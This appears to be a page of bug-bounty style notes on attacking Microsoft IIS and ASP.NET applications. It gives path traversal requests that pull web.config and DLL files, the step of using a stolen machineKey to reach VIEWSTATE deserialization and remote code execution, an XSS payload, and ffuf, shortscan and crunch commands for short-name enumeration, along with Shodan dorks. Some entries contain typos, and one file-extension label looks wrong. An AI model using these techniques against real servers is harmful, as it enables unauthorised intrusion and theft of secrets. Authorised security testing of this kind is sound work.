Hacking IIS Applications
Last updated
Was this helpful?
Last updated
Was this helpful?
https://youtu.be/XlmeSFm3RT4?si=hfhzGF9ymG6Igt5j
https://www.youtube.com/watch?v=cqM-MdPkaWo
https://www.youtube.com/watch?v=yyD8Z5Qar5I
https://www.youtube.com/watch?v=_4W0WXUatiw
Got HTTPAPI ERROR 404
It is IP but you can get the subdomain from the certificate common name
Edit the Host Header
Came across subdomain that running IIS Server apply.company.com
VHost Enumeration using ffuf or burp intruder
Found mssql.company.com
Running MSSQL Explorer/Manager
DownloadCategoryExcel?fileName=../../web.config
DownloadCategoryExcel?fileName=../../glopal.asax
<add namespace="Company.Web.Api.dell/>
DownloadCategoryExcel?fileName=../../bin/Company.Web.Api.dll
Optain machinekey from web.config file (validation key and decryption keyy)
VIEWSTATE -> Insecure Deserialization -> RCE
Try in login pages, redirects, forms & dynamic URL construction (~/images/). Payload: /(A(%22onerror='alert%60123%60'test))/
Found Leaked zip files contains DLL Files?
Use DNSpy to reverse them to source code
ffuf -w iis.txt -u
https://example.com/FUZZ
ffuf -w iis.txt -u
https://example.com/shortnameFUZZ
shortscan https://apply.company.com/
IIS Short Name Scanner
Explore the latest version on GitHub.
Got a part of file names not the full name ? let's fuzz the rest
LIDSDI -> LIDFUZZ | EASYFI -> EASYFUZZ
ffuf -w wordlist.txt -D -e asp,aspx,ashx,asmx -t 100 -c -u https://apply.company.com/lidsFUZZ
You can make your own wro=dlist using wordlist generator https://sourceforge.net/projects/crunch-wordlist/ https://github.com/jim3ma/crunch
./crunch 0 3 abcdefghijklmnopqrstuvwxyz0123456789 -o 3char.txt
Fuzzing doesn't work? try search in Github or use https://github.com/retkoussa/gsnw
Check out the Nuclei templates for fuzzing techniques.
Utilize Shodan to identify IIS instances with specific characteristics:
http.title:"IIS"
Ssl:"Company Inc." http.title:"IIS"
Ssl.cert.subject.CN:"company.in" http.title:"IIS"
ASP.NET_Sessionid
ASPSESSION
X-AspNet-Version: (.*)\\;version:\\1
X-Powered-By:^ASP\\.NET
<input[^>]+name\"_VIEWSTATE
\\.aspx?(?.$|\\?)
Exclude these directories from your scans:
ASPNET~1
DEFAULT~1.ASP
DEFAULT~1.CSS
GLOBAL.ASA
GLOBAL.ASP
GLOBAL.CS
MASTER.CS
WEB.CON
Bruteforce file extensions to uncover vulnerabilities:
.aspx
(Legacy active server pages)
.aspx
(Modern Active server pages)
.ashx
(APIs/AJAX)
.wsdl
(Web Services Description Language)
.wadl
(Web Application Description Languages)
.asmx
(XML Web Services)
.xml
.zip
.txt
naabu -host iis.target.com